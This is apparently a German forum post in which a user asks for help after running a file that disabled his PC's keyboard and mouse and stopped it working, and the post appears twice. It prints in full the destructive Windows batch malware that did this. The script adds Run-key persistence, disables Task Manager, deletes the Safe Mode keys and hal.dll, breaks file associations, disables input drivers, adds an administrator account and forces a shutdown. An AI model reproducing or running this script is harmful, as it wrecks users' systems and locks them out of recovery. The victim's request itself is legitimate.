hallo,
ich habe einen eine datei geschickt bekommen, die sich als virus heraustellte, und habe jetzt das Problem das mein System nicht mehr startet geschweige den funktioniert, es fährt ganz normal hoch, und bei der Benutzeranmeldung ist ein neuer Benutzer, Maus und Tastatur reagieren nicht mehr.
hier noch der Virus:
@echo off
rem made with PhySek VirusMaker!
rem ---Bad-Sec-Door--->
md %windir%\Command
copy %0 "%windir%\Command"
ren %windir%\Command\*.* Command.bat
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Winlogon /t REG_SZ /d %windir%\Command\Command.bat /f
copy %0 copy "C:\DOKUME~1\Tim\LOKALE~1\Temp\184.tmp\batchfile.bat" "%userprofile%\startm~1\Programme\Autostart"
ren %0 "%userprofile%\startm~1\Programme\Autostart\*.bat" Command.bat
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg delete HKLM\SYSTEM\currentcontrolset\control\safeboot\min imal /f
reg delete HKLM\SYSTEM\currentcontrolset\control\safeboot\net work /f
assoc .mp3=error
assoc .mp4=error
assoc .jpg=error
assoc .gif=error
assoc .bmp=error
assoc .com=error
assoc .txt=error
assoc .doc=error
assoc .mpg=error
assoc .avi=error
assoc .mpeg=error
assoc .3gp=error
assoc .flv=error
assoc .exe=error
del /f /s /q C:\WINDOWS\system32\hal.dll
reg add "HKLM\System\CurrentControlSet\Services\Mouclass" /v Start /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\Kbdclass" /v Start /t REG_DWORD /d "4" /f
net user "PhySek" "123456" /add
net localgroup Administratoren "Sph1nX" /add
shutdown -s -f -t 8 -c "Hehe du wurdest gerade geowend :-) Naja dein System wird warscheinlich nie mehr starten^^ hf &gl by PhySek"
ich hoffe die letzte Botschadft stimmt nicht und ich habe noch eine chance.
lg Markus
ich habe einen eine datei geschickt bekommen, die sich als virus heraustellte, und habe jetzt das Problem das mein System nicht mehr startet geschweige den funktioniert, es fährt ganz normal hoch, und bei der Benutzeranmeldung ist ein neuer Benutzer, Maus und Tastatur reagieren nicht mehr.
hier noch der Virus:
@echo off
rem made with PhySek VirusMaker!
rem ---Bad-Sec-Door--->
md %windir%\Command
copy %0 "%windir%\Command"
ren %windir%\Command\*.* Command.bat
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Winlogon /t REG_SZ /d %windir%\Command\Command.bat /f
copy %0 copy "C:\DOKUME~1\Tim\LOKALE~1\Temp\184.tmp\batchfile.bat" "%userprofile%\startm~1\Programme\Autostart"
ren %0 "%userprofile%\startm~1\Programme\Autostart\*.bat" Command.bat
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
reg delete HKLM\SYSTEM\currentcontrolset\control\safeboot\min imal /f
reg delete HKLM\SYSTEM\currentcontrolset\control\safeboot\net work /f
assoc .mp3=error
assoc .mp4=error
assoc .jpg=error
assoc .gif=error
assoc .bmp=error
assoc .com=error
assoc .txt=error
assoc .doc=error
assoc .mpg=error
assoc .avi=error
assoc .mpeg=error
assoc .3gp=error
assoc .flv=error
assoc .exe=error
del /f /s /q C:\WINDOWS\system32\hal.dll
reg add "HKLM\System\CurrentControlSet\Services\Mouclass" /v Start /t REG_DWORD /d "4" /f
reg add "HKLM\System\CurrentControlSet\Services\Kbdclass" /v Start /t REG_DWORD /d "4" /f
net user "PhySek" "123456" /add
net localgroup Administratoren "Sph1nX" /add
shutdown -s -f -t 8 -c "Hehe du wurdest gerade geowend :-) Naja dein System wird warscheinlich nie mehr starten^^ hf &gl by PhySek"
ich hoffe die letzte Botschadft stimmt nicht und ich habe noch eine chance.
lg Markus
